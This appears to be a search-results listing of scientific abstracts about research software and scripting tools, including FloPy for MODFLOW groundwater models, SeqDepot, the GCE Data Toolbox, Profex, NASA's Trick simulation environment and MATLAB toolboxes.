SeqDepot: streamlined database of biological sequences and precomputed features.
Ulrich, Luke E; Zhulin, Igor B
2014-01-15
Assembling and/or producing integrated knowledge of sequence features continues to be an onerous and redundant task despite a large number of existing resources. We have developed SeqDepot-a novel database that focuses solely on two primary goals: (i) assimilating known primary sequences with predicted feature data and (ii) providing the most simple and straightforward means to procure and readily use this information. Access to >28.5 million sequences and 300 million features is provided through a well-documented and flexible RESTful interface that supports fetching specific data subsets, bulk queries, visualization and searching by MD5 digests or external database identifiers. We have also developed an HTML5/JavaScript web application exemplifying how to interact with SeqDepot and Perl/Python scripts for use with local processing pipelines. Freely available on the web at http://seqdepot.net/. RESTaccess via http://seqdepot.net/api/v1. Database files and scripts maybe downloaded from http://seqdepot.net/download.
Scripting MODFLOW model development using Python and FloPy
Bakker, Mark; Post, Vincent E. A.; Langevin, Christian D.; Hughes, Joseph D.; White, Jeremy; Starn, Jeffrey; Fienen, Michael N.
2016-01-01
Graphical user interfaces (GUIs) are commonly used to construct and postprocess numerical groundwater flow and transport models. Scripting model development with the programming language Python is presented here as an alternative approach. One advantage of Python is that there are many packages available to facilitate the model development process, including packages for plotting, array manipulation, optimization, and data analysis. For MODFLOW-based models, the FloPy package was developed by the authors to construct model input files, run the model, and read and plot simulation results. Use of Python with the available scientific packages and FloPy facilitates data exploration, alternative model evaluations, and model analyses that can be difficult to perform with GUIs. Furthermore, Python scripts are a complete, transparent, and repeatable record of the modeling process. The approach is introduced with a simple FloPy example to create and postprocess a MODFLOW model. A more complicated capture-fraction analysis with a real-world model is presented to demonstrate the types of analyses that can be performed using Python and FloPy.
NASA Astrophysics Data System (ADS)
Sylwestrzak, Marcin; Szlag, Daniel; Marchand, Paul J.; Kumar, Ashwin S.; Lasser, Theo
2017-08-01
We present an application of massively parallel processing of quantitative flow measurements data acquired using spectral optical coherence microscopy (SOCM). The need for massive signal processing of these particular datasets has been a major hurdle for many applications based on SOCM. In view of this difficulty, we implemented and adapted quantitative total flow estimation algorithms on graphics processing units (GPU) and achieved a 150 fold reduction in processing time when compared to a former CPU implementation. As SOCM constitutes the microscopy counterpart to spectral optical coherence tomography (SOCT), the developed processing procedure can be applied to both imaging modalities. We present the developed DLL library integrated in MATLAB (with an example) and have included the source code for adaptations and future improvements. Catalogue identifier: AFBT_v1_0 Program summary URL:http://cpc.cs.qub.ac.uk/summaries/AFBT_v1_0.html Program obtainable from: CPC Program Library, Queen's University, Belfast, N. Ireland Licensing provisions: GNU GPLv3 No. of lines in distributed program, including test data, etc.: 913552 No. of bytes in distributed program, including test data, etc.: 270876249 Distribution format: tar.gz Programming language: CUDA/C, MATLAB. Computer: Intel x64 CPU, GPU supporting CUDA technology. Operating system: 64-bit Windows 7 Professional. Has the code been vectorized or parallelized?: Yes, CPU code has been vectorized in MATLAB, CUDA code has been parallelized. RAM: Dependent on users parameters, typically between several gigabytes and several tens of gigabytes Classification: 6.5, 18. Nature of problem: Speed up of data processing in optical coherence microscopy Solution method: Utilization of GPU for massively parallel data processing Additional comments: Compiled DLL library with source code and documentation, example of utilization (MATLAB script with raw data) Running time: 1,8 s for one B-scan (150 × faster in comparison to the CPU data processing time)
The Figure.tar.gz contains a directory for each WRF ensemble run. In these directories are *.csv files for each meteorology variable examined. These are comma delimited text files that contain statistics for each observation site. Also provided is an R script that reads these files (user would need to change directory pointers) and computes the variability of error and bias of the ensemble at each site and plots these for reproduction of figure 3.This dataset is associated with the following publication:Gilliam , R., C. Hogrefe , J. Godowitch, S. Napelenok , R. Mathur , and S.T. Rao. Impact of inherent meteorology uncertainty on air quality model predictions. JOURNAL OF GEOPHYSICAL RESEARCH-ATMOSPHERES. American Geophysical Union, Washington, DC, USA, 120(23): 12,259–12,280, (2015).
DOE Office of Scientific and Technical Information (OSTI.GOV)
Allevato, Adam
2016-07-21
ROSSTEP is a system for sequentially running roslaunch, rosnode, and bash scripts automatically, for use in Robot Operating System (ROS) applications. The system consists of YAML files which define actions and conditions. A python file parses the code and runs actions sequentially using the sys and subprocess python modules. Between actions, it uses various ROS-based code to check conditions required to proceed, and only moves on to the next action when all the necessary conditions have been met. Included is rosstep-creator, a QT application designed to create the YAML files required for ROSSTEP. It has a nearly one-to-one mapping frommore » interface elements to YAML output, and serves as a convenient GUI for working with the ROSSTEP system.« less
BaHaMAS A Bash Handler to Monitor and Administrate Simulations
NASA Astrophysics Data System (ADS)
Sciarra, Alessandro
2018-03-01
Numerical QCD is often extremely resource demanding and it is not rare to run hundreds of simulations at the same time. Each of these can last for days or even months and it typically requires a job-script file as well as an input file with the physical parameters for the application to be run. Moreover, some monitoring operations (i.e. copying, moving, deleting or modifying files, resume crashed jobs, etc.) are often required to guarantee that the final statistics is correctly accumulated. Proceeding manually in handling simulations is probably the most error-prone way and it is deadly uncomfortable and inefficient! BaHaMAS was developed and successfully used in the last years as a tool to automatically monitor and administrate simulations.
NASA Astrophysics Data System (ADS)
1997-03-01
All the Letters to the Editor in this issue are in the same PostScript or PDF file. Contents Criticisms of hands-on pseudoscience David J Fisher 27 Elderberry Road, Cardiff CF5 3RG, UK Measuring varying fields Don Koks Adelaide University, Australia Relativity at A-level: a comment David Sang 3 Ellasdale Road, Bognor Regis, PO21 2SG, UK
Adaptive smart simulator for characterization and MPPT construction of PV array
NASA Astrophysics Data System (ADS)
Ouada, Mehdi; Meridjet, Mohamed Salah; Dib, Djalel
2016-07-01
Partial shading conditions are among the most important problems in large photovoltaic array. Many works of literature are interested in modeling, control and optimization of photovoltaic conversion of solar energy under partial shading conditions, The aim of this study is to build a software simulator similar to hard simulator and to produce a shading pattern of the proposed photovoltaic array in order to use the delivered information to obtain an optimal configuration of the PV array and construct MPPT algorithm. Graphical user interfaces (Matlab GUI) are built using a developed script, this tool is easy to use, simple, and has a rapid of responsiveness, the simulator supports large array simulations that can be interfaced with MPPT and power electronic converters.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Duro, Francisco Rodrigo; Garcia Blas, Javier; Isaila, Florin
This paper explores novel techniques for improving the performance of many-task workflows based on the Swift scripting language. We propose novel programmer options for automated distributed data placement and task scheduling. These options trigger a data placement mechanism used for distributing intermediate workflow data over the servers of Hercules, a distributed key-value store that can be used to cache file system data. We demonstrate that these new mechanisms can significantly improve the aggregated throughput of many-task workflows with up to 86x, reduce the contention on the shared file system, exploit the data locality, and trade off locality and load balance.
Using Cesium for 3D Thematic Visualisations on the Web
NASA Astrophysics Data System (ADS)
Gede, Mátyás
2018-05-01
Cesium (http://cesiumjs.org) is an open source, WebGL-based JavaScript library for virtual globes and 3D maps. It is an excellent tool for 3D thematic visualisations, but to use its full functionality it has to be feed with its own file format, CZML. Unfortunately, this format is not yet supported by any major GIS software. This paper intro- duces a plugin for QGIS, developed by the author, which facilitates the creation of CZML file for various types of visualisations. The usability of Cesium is also examined in various hardware/software environments.
NASA Astrophysics Data System (ADS)
Sheldon, W.; Chamblee, J.; Cary, R. H.
2013-12-01
Environmental scientists are under increasing pressure from funding agencies and journal publishers to release quality-controlled data in a timely manner, as well as to produce comprehensive metadata for submitting data to long-term archives (e.g. DataONE, Dryad and BCO-DMO). At the same time, the volume of digital data that researchers collect and manage is increasing rapidly due to advances in high frequency electronic data collection from flux towers, instrumented moorings and sensor networks. However, few pre-built software tools are available to meet these data management needs, and those tools that do exist typically focus on part of the data management lifecycle or one class of data. The GCE Data Toolbox has proven to be both a generalized and effective software solution for environmental data management in the Long Term Ecological Research Network (LTER). This open source MATLAB software library, developed by the Georgia Coastal Ecosystems LTER program, integrates metadata capture, creation and management with data processing, quality control and analysis to support the entire data lifecycle. Raw data can be imported directly from common data logger formats (e.g. SeaBird, Campbell Scientific, YSI, Hobo), as well as delimited text files, MATLAB files and relational database queries. Basic metadata are derived from the data source itself (e.g. parsed from file headers) and by value inspection, and then augmented using editable metadata templates containing boilerplate documentation, attribute descriptors, code definitions and quality control rules. Data and metadata content, quality control rules and qualifier flags are then managed together in a robust data structure that supports database functionality and ensures data validity throughout processing. A growing suite of metadata-aware editing, quality control, analysis and synthesis tools are provided with the software to support managing data using graphical forms and command-line functions, as well as developing automated workflows for unattended processing. Finalized data and structured metadata can be exported in a wide variety of text and MATLAB formats or uploaded to a relational database for long-term archiving and distribution. The GCE Data Toolbox can be used as a complete, light-weight solution for environmental data and metadata management, but it can also be used in conjunction with other cyber infrastructure to provide a more comprehensive solution. For example, newly acquired data can be retrieved from a Data Turbine or Campbell LoggerNet Database server for quality control and processing, then transformed to CUAHSI Observations Data Model format and uploaded to a HydroServer for distribution through the CUAHSI Hydrologic Information System. The GCE Data Toolbox can also be leveraged in analytical workflows developed using Kepler or other systems that support MATLAB integration or tool chaining. This software can therefore be leveraged in many ways to help researchers manage, analyze and distribute the data they collect.
NCL script: cmaq_ensemble_isam_4panels_subdomain.nclNetcdf input file for NCL script, containing ensemble means and standard deviation of ISAM SO4 and O3 contributions from IPM: test.ncPlot (ps): maps_isam_mean_std_lasthour_ipm_so4_o3_east.psPlot (pdf): maps_isam_mean_std_lasthour_ipm_so4_o3_east.pdfPlot (ncgm): maps_isam_mean_std_lasthour_ipm_so4_o3_east.ncgmThis dataset is associated with the following publication:Gilliam , R., C. Hogrefe , J. Godowitch, S. Napelenok , R. Mathur , and S.T. Rao. Impact of inherent meteorology uncertainty on air quality model predictions. JOURNAL OF GEOPHYSICAL RESEARCH-ATMOSPHERES. American Geophysical Union, Washington, DC, USA, 120(23): 12,259–12,280, (2015).
NASA Astrophysics Data System (ADS)
Tomesh, Trevor; Price, Colin
2011-03-01
Using the scripting language for the Unreal Tournament 2004 Engine, Unreal Script, demonstrations in the field of oscillations and waves were designed and developed. Variations on Euler's method and the Runge-Kutta method were used to numerically solve the equations of motion for seven different physical systems which were visually represented in the immersive environment of Unreal Tournament 2004. Data from each system was written to an output file, plotted and analyzed. The over-arching goal of this research is to successfully design and develop useful teaching tools for the k-12 and undergraduate classroom which, presented in the form of a video game, is immersive, engaging and educational.
Trick Simulation Environment 07
NASA Technical Reports Server (NTRS)
Lin, Alexander S.; Penn, John M.
2012-01-01
The Trick Simulation Environment is a generic simulation toolkit used for constructing and running simulations. This release includes a Monte Carlo analysis simulation framework and a data analysis package. It produces all auto documentation in XML. Also, the software is capable of inserting a malfunction at any point during the simulation. Trick 07 adds variable server output options and error messaging and is capable of using and manipulating wide characters for international support. Wide character strings are available as a fundamental type for variables processed by Trick. A Trick Monte Carlo simulation uses a statistically generated, or predetermined, set of inputs to iteratively drive the simulation. Also, there is a framework in place for optimization and solution finding where developers may iteratively modify the inputs per run based on some analysis of the outputs. The data analysis package is capable of reading data from external simulation packages such as MATLAB and Octave, as well as the common comma-separated values (CSV) format used by Excel, without the use of external converters. The file formats for MATLAB and Octave were obtained from their documentation sets, and Trick maintains generic file readers for each format. XML tags store the fields in the Trick header comments. For header files, XML tags for structures and enumerations, and the members within are stored in the auto documentation. For source code files, XML tags for each function and the calling arguments are stored in the auto documentation. When a simulation is built, a top level XML file, which includes all of the header and source code XML auto documentation files, is created in the simulation directory. Trick 07 provides an XML to TeX converter. The converter reads in header and source code XML documentation files and converts the data to TeX labels and tables suitable for inclusion in TeX documents. A malfunction insertion capability allows users to override the value of any simulation variable, or call a malfunction job, at any time during the simulation. Users may specify conditions, use the return value of a malfunction trigger job, or manually activate a malfunction. The malfunction action may consist of executing a block of input file statements in an action block, setting simulation variable values, call a malfunction job, or turn on/off simulation jobs.
Profex: a graphical user interface for the Rietveld refinement program BGMN.
Doebelin, Nicola; Kleeberg, Reinhard
2015-10-01
Profex is a graphical user interface for the Rietveld refinement program BGMN . Its interface focuses on preserving BGMN 's powerful and flexible scripting features by giving direct access to BGMN input files. Very efficient workflows for single or batch refinements are achieved by managing refinement control files and structure files, by providing dialogues and shortcuts for many operations, by performing operations in the background, and by providing import filters for CIF and XML crystal structure files. Refinement results can be easily exported for further processing. State-of-the-art graphical export of diffraction patterns to pixel and vector graphics formats allows the creation of publication-quality graphs with minimum effort. Profex reads and converts a variety of proprietary raw data formats and is thus largely instrument independent. Profex and BGMN are available under an open-source license for Windows, Linux and OS X operating systems.
Profex: a graphical user interface for the Rietveld refinement program BGMN
Doebelin, Nicola; Kleeberg, Reinhard
2015-01-01
Profex is a graphical user interface for the Rietveld refinement program BGMN. Its interface focuses on preserving BGMN’s powerful and flexible scripting features by giving direct access to BGMN input files. Very efficient workflows for single or batch refinements are achieved by managing refinement control files and structure files, by providing dialogues and shortcuts for many operations, by performing operations in the background, and by providing import filters for CIF and XML crystal structure files. Refinement results can be easily exported for further processing. State-of-the-art graphical export of diffraction patterns to pixel and vector graphics formats allows the creation of publication-quality graphs with minimum effort. Profex reads and converts a variety of proprietary raw data formats and is thus largely instrument independent. Profex and BGMN are available under an open-source license for Windows, Linux and OS X operating systems. PMID:26500466
NASA Technical Reports Server (NTRS)
McNab, A. David; woo, Alex (Technical Monitor)
1999-01-01
Portals, an experimental feature of 4.4BSD, extend the file system name space by exporting certain open () requests to a user-space daemon. A portal daemon is mounted into the file name space as if it were a standard file system. When the kernel resolves a pathname and encounters a portal mount point, the remainder of the path is passed to the portal daemon. Depending on the portal "pathname" and the daemon's configuration, some type of open (2) is performed. The resulting file descriptor is passed back to the kernel which eventually returns it to the user, to whom it appears that a "normal" open has occurred. A proxy portalfs file system is responsible for kernel interaction with the daemon. The overall effect is that the portal daemon performs an open (2) on behalf of the kernel, possibly hiding substantial complexity from the calling process. One particularly useful application is implementing a connection service that allows simple scripts to open network sockets. This paper describes the implementation of portals for LINUX 2.0.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Dolan, Daniel H.; Ao, Tommy
The Sandia Data Archive (SDA) format is a specific implementation of the HDF5 (Hierarchal Data Format version 5) standard. The format was developed for storing data in a universally accessible manner. SDA files may contain one or more data records, each associated with a distinct text label. Primitive records provide basic data storage, while compound records support more elaborate grouping. External records allow text/binary files to be carried inside an archive and later recovered. This report documents version 1.0 of the SDA standard. The information provided here is sufficient for reading from and writing to an archive. Although the formatmore » was original designed for use in MATLAB, broader use is encouraged.« less
The Open Spectral Database: an open platform for sharing and searching spectral data.
Chalk, Stuart J
2016-01-01
A number of websites make available spectral data for download (typically as JCAMP-DX text files) and one (ChemSpider) that also allows users to contribute spectral files. As a result, searching and retrieving such spectral data can be time consuming, and difficult to reuse if the data is compressed in the JCAMP-DX file. What is needed is a single resource that allows submission of JCAMP-DX files, export of the raw data in multiple formats, searching based on multiple chemical identifiers, and is open in terms of license and access. To address these issues a new online resource called the Open Spectral Database (OSDB) http://osdb.info/ has been developed and is now available. Built using open source tools, using open code (hosted on GitHub), providing open data, and open to community input about design and functionality, the OSDB is available for anyone to submit spectral data, making it searchable and available to the scientific community. This paper details the concept and coding, internal architecture, export formats, Representational State Transfer (REST) Application Programming Interface and options for submission of data. The OSDB website went live in November 2015. Concurrently, the GitHub repository was made available at https://github.com/stuchalk/OSDB/, and is open for collaborators to join the project, submit issues, and contribute code. The combination of a scripting environment (PHPStorm), a PHP Framework (CakePHP), a relational database (MySQL) and a code repository (GitHub) provides all the capabilities to easily develop REST based websites for ingestion, curation and exposure of open chemical data to the community at all levels. It is hoped this software stack (or equivalent ones in other scripting languages) will be leveraged to make more chemical data available for both humans and computers.
Physiographic rim of the Grand Canyon, Arizona: a digital database
Billingsley, George H.; Hampton, Haydee M.
1999-01-01
This Open-File report is a digital physiographic map database. This pamphlet serves to introduce and describe the digital data. There is no paper map included in the Open-File report. The report does include, however, PostScript and PDF format plot files, each containing an image of the map. For those interested in a paper plot of information contained in the database or in obtaining the PostScript plot files, please see the section entitled "For Those Who Don't Use Digital Geologic Map Databases" below. This physiographic map of the Grand Canyon is modified from previous versions by Billingsley and Hendricks (1989), and Billingsley and others (1997). The boundary is drawn approximately along the topographic rim of the Grand Canyon and its tributary canyons between Lees Ferry and Lake Mead (shown in red). Several isolated small mesas, buttes, and plateaus are within this area, which overall encompasses about 2,600 square miles. The Grand Canyon lies within the southwestern part of the Colorado Plateaus of northern Arizona between Lees Ferry, Colorado River Mile 0, and Lake Mead, Colorado River Mile 277. The Colorado River is the corridor for raft trips through the Grand Canyon. Limestone rocks of the Kaibab Formation form most of the north and south rims of the Grand Canyon, and a few volcanic rocks form the north rim of parts of the Uinkaret and Shivwits Plateaus. Limestones of the Redwall Limestone and lower Supai Group form the rim of the Hualapai Plateau area, and Limestones of Devonian and Cambrian age form the boundary rim near the mouth of Grand Canyon at the Lake Mead. The natural physiographic boundary of the Grand Canyon is roughly the area a visitor would first view any part of the Grand Canyon and its tributaries.
National Centers for Environmental Prediction
the number of threads used. HWRF group cannot access Zeus and Jet for real-time data transfers from nodes used.). All single jobs will be run on one rack and will not share with parallel jobs. No official change the group when using tag_rstprod (-g option). autotag_rstprod is a script that tags all files. It
ERIC Educational Resources Information Center
Barber, Jill
2018-01-01
Adaptive Comparative Judgement (ACJ) is an alternative to conventional marking in which the assessor (judge) merely compares two answers and chooses a winner. (Scripts are typically uploaded to the CompareAssess interface as pdf files and are presented side-by-side.) Repeated comparisons and application of the sorting algorithm leads to scripts…
Running High-Throughput Jobs on Peregrine | High-Performance Computing |
unique name (using "name=") and usse the task name to create a unique output file name. For runs on and how many tasks to give to each worker at a time using the NITRO_COORD_OPTIONS environment . Finally, you start Nitro by executing launch_nitro.sh. Sample Nitro job script To run a job using the
Bringing Control System User Interfaces to the Web
DOE Office of Scientific and Technical Information (OSTI.GOV)
Chen, Xihui; Kasemir, Kay
With the evolution of web based technologies, especially HTML5 [1], it becomes possible to create web-based control system user interfaces (UI) that are cross-browser and cross-device compatible. This article describes two technologies that facilitate this goal. The first one is the WebOPI [2], which can seamlessly display CSS BOY [3] Operator Interfaces (OPI) in web browsers without modification to the original OPI file. The WebOPI leverages the powerful graphical editing capabilities of BOY and provides the convenience of re-using existing OPI files. On the other hand, it uses generic JavaScript and a generic communication mechanism between the web browser andmore » web server. It is not optimized for a control system, which results in unnecessary network traffic and resource usage. Our second technology is the WebSocket-based Process Data Access (WebPDA) [4]. It is a protocol that provides efficient control system data communication using WebSocket [5], so that users can create web-based control system UIs using standard web page technologies such as HTML, CSS and JavaScript. WebPDA is control system independent, potentially supporting any type of control system.« less
CancerNet redistribution via WWW.
Quade, G; Püschel, N; Far, F
1996-01-01
CancerNet from the National Cancer Institute contains nearly 500 ASCII-files, updated monthly, with up-to-date information about cancer and the "Golden Standard" in tumor therapy. Perl scripts are used to convert these files to HTML-documents. A complex algorithm, using regular expression matching and extensive exception handling, detects headlines, listings and other constructs of the original ASCII-text and converts them into their HTML-counterparts. A table of contents is also created during the process. The resulting files are indexed for full-text search via WAIS. Building the complete CancerNet WWW redistribution takes less than two hours with a minimum of manual work. For 26,000 requests of information from our service per month the average costs for the worldwide delivery of one document is about 19 cents.
MATLAB as an incentive for student learning of skills
NASA Astrophysics Data System (ADS)
Bank, C. G.; Ghent, R. R.
2016-12-01
Our course "Computational Geology" takes a holistic approach to student learning by using MATLAB as a focal point to increase students' computing, quantitative reasoning, data analysis, report writing, and teamwork skills. The course, taught since 2007 with recent enrollments around 35 and aimed at 2nd to 3rd-year students, is required for the Geology and Earth and Environmental Systems major programs, and can be chosen as elective in our other programs, including Geophysics. The course is divided into five projects: Pacific plate velocity from the Hawaiian hotspot track, predicting CO2 concentration in the atmosphere, volume of Earth's oceans and sea-level rise, comparing wind directions for Vancouver and Squamish, and groundwater flow. Each project is based on real data, focusses on a mathematical concept (linear interpolation, gradients, descriptive statistics, differential equations) and highlights a programming task (arrays, functions, text file input/output, curve fitting). Working in teams of three, students need to develop a conceptional model to explain the data, and write MATLAB code to visualize the data and match it to their conceptional model. The programming is guided, and students work individually on different aspects (for example: reading the data, fitting a function, unit conversion) which they need to put together to solve the problem. They then synthesize their thought process in a paper. Anecdotal evidence shows that students continue using MATLAB in other courses.
DataPflex: a MATLAB-based tool for the manipulation and visualization of multidimensional datasets.
Hendriks, Bart S; Espelin, Christopher W
2010-02-01
DataPflex is a MATLAB-based application that facilitates the manipulation and visualization of multidimensional datasets. The strength of DataPflex lies in the intuitive graphical user interface for the efficient incorporation, manipulation and visualization of high-dimensional data that can be generated by multiplexed protein measurement platforms including, but not limited to Luminex or Meso-Scale Discovery. Such data can generally be represented in the form of multidimensional datasets [for example (time x stimulation x inhibitor x inhibitor concentration x cell type x measurement)]. For cases where measurements are made in a combinational fashion across multiple dimensions, there is a need for a tool to efficiently manipulate and reorganize such data for visualization. DataPflex accepts data consisting of up to five arbitrary dimensions in addition to a measurement dimension. Data are imported from a simple .xls format and can be exported to MATLAB or .xls. Data dimensions can be reordered, subdivided, merged, normalized and visualized in the form of collections of line graphs, bar graphs, surface plots, heatmaps, IC50's and other custom plots. Open source implementation in MATLAB enables easy extension for custom plotting routines and integration with more sophisticated analysis tools. DataPflex is distributed under the GPL license (http://www.gnu.org/licenses/) together with documentation, source code and sample data files at: http://code.google.com/p/datapflex. Supplementary data available at Bioinformatics online.
Automatic Command Sequence Generation
NASA Technical Reports Server (NTRS)
Fisher, Forest; Gladded, Roy; Khanampompan, Teerapat
2007-01-01
Automatic Sequence Generator (Autogen) Version 3.0 software automatically generates command sequences for the Mars Reconnaissance Orbiter (MRO) and several other JPL spacecraft operated by the multi-mission support team. Autogen uses standard JPL sequencing tools like APGEN, ASP, SEQGEN, and the DOM database to automate the generation of uplink command products, Spacecraft Command Message Format (SCMF) files, and the corresponding ground command products, DSN Keywords Files (DKF). Autogen supports all the major multi-mission mission phases including the cruise, aerobraking, mapping/science, and relay mission phases. Autogen is a Perl script, which functions within the mission operations UNIX environment. It consists of two parts: a set of model files and the autogen Perl script. Autogen encodes the behaviors of the system into a model and encodes algorithms for context sensitive customizations of the modeled behaviors. The model includes knowledge of different mission phases and how the resultant command products must differ for these phases. The executable software portion of Autogen, automates the setup and use of APGEN for constructing a spacecraft activity sequence file (SASF). The setup includes file retrieval through the DOM (Distributed Object Manager), an object database used to store project files. This step retrieves all the needed input files for generating the command products. Depending on the mission phase, Autogen also uses the ASP (Automated Sequence Processor) and SEQGEN to generate the command product sent to the spacecraft. Autogen also provides the means for customizing sequences through the use of configuration files. By automating the majority of the sequencing generation process, Autogen eliminates many sequence generation errors commonly introduced by manually constructing spacecraft command sequences. Through the layering of commands into the sequence by a series of scheduling algorithms, users are able to rapidly and reliably construct the desired uplink command products. With the aid of Autogen, sequences may be produced in a matter of hours instead of weeks, with a significant reduction in the number of people on the sequence team. As a result, the uplink product generation process is significantly streamlined and mission risk is significantly reduced. Autogen is used for operations of MRO, Mars Global Surveyor (MGS), Mars Exploration Rover (MER), Mars Odyssey, and will be used for operations of Phoenix. Autogen Version 3.0 is the operational version of Autogen including the MRO adaptation for the cruise mission phase, and was also used for development of the aerobraking and mapping mission phases for MRO.
Free software helps map and display data
NASA Astrophysics Data System (ADS)
Wessel, Paul; Smith, Walter H. F.
When creating camera-ready figures, most scientists are familiar with the sequence of raw data → processing → final illustration and with the spending of large sums of money to finalize papers for submission to scientific journals, prepare proposals, and create overheads and slides for various presentations. This process can be tedious and is often done manually, since available commercial or in-house software usually can do only part of the job.To expedite this process, we introduce the Generic Mapping Tools (GMT), which is a free, public domain software package that can be used to manipulate columns of tabular data, time series, and gridded data sets and to display these data in a variety of forms ranging from simple x-y plots to maps and color, perspective, and shaded-relief illustrations. GMT uses the PostScript page description language, which can create arbitrarily complex images in gray tones or 24-bit true color by superimposing multiple plot files. Line drawings, bitmapped images, and text can be easily combined in one illustration. PostScript plot files are device-independent, meaning the same file can be printed at 300 dots per inch (dpi) on an ordinary laserwriter or at 2470 dpi on a phototypesetter when ultimate quality is needed. GMT software is written as a set of UNIX tools and is totally self contained and fully documented. The system is offered free of charge to federal agencies and nonprofit educational organizations worldwide and is distributed over the computer network Internet.
Tool for Statistical Analysis and Display of Landing Sites
NASA Technical Reports Server (NTRS)
Wawrzyniak, Geoffrey; Kennedy, Brian; Knocke, Philip; Michel, John
2006-01-01
MarsLS is a software tool for analyzing statistical dispersion of spacecraft-landing sites and displaying the results of its analyses. Originally intended for the Mars Explorer Rover (MER) mission, MarsLS is also applicable to landing sites on Earth and non-MER sites on Mars. MarsLS is a collection of interdependent MATLAB scripts that utilize the MATLAB graphical-user-interface software environment to display landing-site data (see figure) on calibrated image-maps of the Martian or other terrain. The landing-site data comprise latitude/longitude pairs generated by Monte Carlo runs of other computer programs that simulate entry, descent, and landing. Using these data, MarsLS can compute a landing-site ellipse a standard means of depicting the area within which the spacecraft can be expected to land with a given probability. MarsLS incorporates several features for the user s convenience, including capabilities for drawing lines and ellipses, overlaying kilometer or latitude/longitude grids, drawing and/or specifying lines and/or points, entering notes, defining and/or displaying polygons to indicate hazards or areas of interest, and evaluating hazardous and/or scientifically interesting areas. As part of such an evaluation, MarsLS can compute the probability of landing in a specified polygonal area.
Efficient simulation of intrinsic, extrinsic and external noise in biochemical systems
Pischel, Dennis; Sundmacher, Kai; Flassig, Robert J.
2017-01-01
Abstract Motivation: Biological cells operate in a noisy regime influenced by intrinsic, extrinsic and external noise, which leads to large differences of individual cell states. Stochastic effects must be taken into account to characterize biochemical kinetics accurately. Since the exact solution of the chemical master equation, which governs the underlying stochastic process, cannot be derived for most biochemical systems, approximate methods are used to obtain a solution. Results: In this study, a method to efficiently simulate the various sources of noise simultaneously is proposed and benchmarked on several examples. The method relies on the combination of the sigma point approach to describe extrinsic and external variability and the τ-leaping algorithm to account for the stochasticity due to probabilistic reactions. The comparison of our method to extensive Monte Carlo calculations demonstrates an immense computational advantage while losing an acceptable amount of accuracy. Additionally, the application to parameter optimization problems in stochastic biochemical reaction networks is shown, which is rarely applied due to its huge computational burden. To give further insight, a MATLAB script is provided including the proposed method applied to a simple toy example of gene expression. Availability and implementation: MATLAB code is available at Bioinformatics online. Contact: flassig@mpi-magdeburg.mpg.de Supplementary information: Supplementary data are available at Bioinformatics online. PMID:28881987
Baumuratova, Tatiana; Dobre, Simona; Bastogne, Thierry; Sauter, Thomas
2013-01-01
Systems with bifurcations may experience abrupt irreversible and often unwanted shifts in their performance, called critical transitions. For many systems like climate, economy, ecosystems it is highly desirable to identify indicators serving as early warnings of such regime shifts. Several statistical measures were recently proposed as early warnings of critical transitions including increased variance, autocorrelation and skewness of experimental or model-generated data. The lack of automatized tool for model-based prediction of critical transitions led to designing DyGloSA – a MATLAB toolbox for dynamical global parameter sensitivity analysis (GPSA) of ordinary differential equations models. We suggest that the switch in dynamics of parameter sensitivities revealed by our toolbox is an early warning that a system is approaching a critical transition. We illustrate the efficiency of our toolbox by analyzing several models with bifurcations and predicting the time periods when systems can still avoid going to a critical transition by manipulating certain parameter values, which is not detectable with the existing SA techniques. DyGloSA is based on the SBToolbox2 and contains functions, which compute dynamically the global sensitivity indices of the system by applying four main GPSA methods: eFAST, Sobol's ANOVA, PRCC and WALS. It includes parallelized versions of the functions enabling significant reduction of the computational time (up to 12 times). DyGloSA is freely available as a set of MATLAB scripts at http://bio.uni.lu/systems_biology/software/dyglosa. It requires installation of MATLAB (versions R2008b or later) and the Systems Biology Toolbox2 available at www.sbtoolbox2.org. DyGloSA can be run on Windows and Linux systems, -32 and -64 bits. PMID:24367574
Baumuratova, Tatiana; Dobre, Simona; Bastogne, Thierry; Sauter, Thomas
2013-01-01
Systems with bifurcations may experience abrupt irreversible and often unwanted shifts in their performance, called critical transitions. For many systems like climate, economy, ecosystems it is highly desirable to identify indicators serving as early warnings of such regime shifts. Several statistical measures were recently proposed as early warnings of critical transitions including increased variance, autocorrelation and skewness of experimental or model-generated data. The lack of automatized tool for model-based prediction of critical transitions led to designing DyGloSA - a MATLAB toolbox for dynamical global parameter sensitivity analysis (GPSA) of ordinary differential equations models. We suggest that the switch in dynamics of parameter sensitivities revealed by our toolbox is an early warning that a system is approaching a critical transition. We illustrate the efficiency of our toolbox by analyzing several models with bifurcations and predicting the time periods when systems can still avoid going to a critical transition by manipulating certain parameter values, which is not detectable with the existing SA techniques. DyGloSA is based on the SBToolbox2 and contains functions, which compute dynamically the global sensitivity indices of the system by applying four main GPSA methods: eFAST, Sobol's ANOVA, PRCC and WALS. It includes parallelized versions of the functions enabling significant reduction of the computational time (up to 12 times). DyGloSA is freely available as a set of MATLAB scripts at http://bio.uni.lu/systems_biology/software/dyglosa. It requires installation of MATLAB (versions R2008b or later) and the Systems Biology Toolbox2 available at www.sbtoolbox2.org. DyGloSA can be run on Windows and Linux systems, -32 and -64 bits.
Scripting MODFLOW Model Development Using Python and FloPy.
Bakker, M; Post, V; Langevin, C D; Hughes, J D; White, J T; Starn, J J; Fienen, M N
2016-09-01
Graphical user interfaces (GUIs) are commonly used to construct and postprocess numerical groundwater flow and transport models. Scripting model development with the programming language Python is presented here as an alternative approach. One advantage of Python is that there are many packages available to facilitate the model development process, including packages for plotting, array manipulation, optimization, and data analysis. For MODFLOW-based models, the FloPy package was developed by the authors to construct model input files, run the model, and read and plot simulation results. Use of Python with the available scientific packages and FloPy facilitates data exploration, alternative model evaluations, and model analyses that can be difficult to perform with GUIs. Furthermore, Python scripts are a complete, transparent, and repeatable record of the modeling process. The approach is introduced with a simple FloPy example to create and postprocess a MODFLOW model. A more complicated capture-fraction analysis with a real-world model is presented to demonstrate the types of analyses that can be performed using Python and FloPy. © 2016, National Ground Water Association.
NASA Technical Reports Server (NTRS)
Chan, Gordon C.
1991-01-01
The new 1991 COSMIC/NASTRAN version, compatible with the older versions, tries to remove some old constraints and make it easier to extract information from the plot file. It also includes some useful improvements and new enhancements. New features available in the 1991 version are described. They include a new PLT1 tape with simplified ASCII plot commands and short records, combined hidden and shrunk plot, an x-y-z coordinate system on all structural plots, element offset plot, improved character size control, improved FIND and NOFIND logic, a new NASPLOT post-prosessor to perform screen plotting or generate PostScript files, and a BASIC/NASTPLOT program for PC.
